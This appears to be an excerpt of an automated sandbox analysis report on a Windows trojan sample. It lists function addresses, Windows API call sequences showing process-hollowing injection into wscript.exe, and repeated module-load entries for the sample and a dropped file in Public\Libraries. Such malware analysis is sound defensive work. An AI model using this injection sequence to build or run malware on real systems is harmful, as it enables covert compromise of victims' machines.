Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A128EC	1_2_05A128EC
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A1E824	1_2_05A1E824
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A01002	1_2_05A01002
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0597EBB0	1_2_0597EBB0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A0DBD2	1_2_05A0DBD2
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A003DA	1_2_05A003DA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A12B28	1_2_05A12B28
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05A122AE	1_2_05A122AE
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059FFA2B	1_2_059FFA2B

Source: C:\Windows\SysWOW64\wscript.exe	Code function: String function: 0594B150 appears 45 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: String function: 02724C24 appears 221 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: String function: 027248A0 appears 53 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: String function: 02724A98 appears 51 times

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_02739128 InetIsOffline,InetIsOffline,CopyFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,	0_2_02739128
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_02733690 LoadLibraryA,GetModuleHandleA,GetProcAddress,RtlMoveMemory,GetCurrentProcess,NtFlushVirtualMemory,FreeLibrary,	0_2_02733690
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0273779C InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualFree,VirtualAllocEx,GetProcAddress,FreeLibrary,WriteProcessMemory,NtProtectVirtualMemory,	0_2_0273779C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0273368E LoadLibraryA,GetModuleHandleA,GetProcAddress,RtlMoveMemory,GetCurrentProcess,NtFlushVirtualMemory,FreeLibrary,	0_2_0273368E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_02733990 InetIsOffline,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,GetProcAddress,FreeLibrary,NtProtectVirtualMemory,SetThreadContext,NtResumeThread,	0_2_02733990
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Code function: 0_2_0273398E InetIsOffline,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,GetProcAddress,FreeLibrary,NtProtectVirtualMemory,SetThreadContext,NtResumeThread,	0_2_0273398E
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059895D0 NtClose,LdrInitializeThunk,	1_2_059895D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989780 NtMapViewOfSection,LdrInitializeThunk,	1_2_05989780
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989FE0 NtCreateMutant,LdrInitializeThunk,	1_2_05989FE0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059896E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_059896E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_05989660
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059899A0 NtCreateSection,LdrInitializeThunk,	1_2_059899A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_05989910
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_05989860
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059895F0 NtQueryInformationFile,	1_2_059895F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0598AD30 NtSetContextThread,	1_2_0598AD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989520 NtWaitForSingleObject,	1_2_05989520
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989540 NtReadFile,	1_2_05989540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989560 NtWriteFile,	1_2_05989560
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059897A0 NtUnmapViewOfSection,	1_2_059897A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0598A710 NtOpenProcessToken,	1_2_0598A710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989710 NtQueryInformationToken,	1_2_05989710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989730 NtQueryVirtualMemory,	1_2_05989730
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0598A770 NtOpenThread,	1_2_0598A770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989770 NtSetInformationFile,	1_2_05989770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989760 NtOpenProcess,	1_2_05989760
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059896D0 NtCreateKey,	1_2_059896D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989610 NtEnumerateValueKey,	1_2_05989610
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989650 NtQueryValueKey,	1_2_05989650
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989670 NtQueryInformationProcess,	1_2_05989670
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059899D0 NtCreateProcessEx,	1_2_059899D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989950 NtQueueApcThread,	1_2_05989950
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059898A0 NtWriteVirtualMemory,	1_2_059898A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_059898F0 NtReadVirtualMemory,	1_2_059898F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989820 NtEnumerateKey,	1_2_05989820
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0598B040 NtSuspendThread,	1_2_0598B040
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989840 NtDelayExecution,	1_2_05989840
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_0598A3B0 NtGetContextThread,	1_2_0598A3B0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989B00 NtSetValueKey,	1_2_05989B00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989A80 NtOpenDirectoryObject,	1_2_05989A80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989A10 NtQuerySection,	1_2_05989A10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989A00 NtProtectVirtualMemory,	1_2_05989A00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989A20 NtResumeThread,	1_2_05989A20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 1_2_05989A50 NtCreateFile,	1_2_05989A50

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Iuigzwjd.exe	Section loaded: amtahoo.dll	Jump to behavior
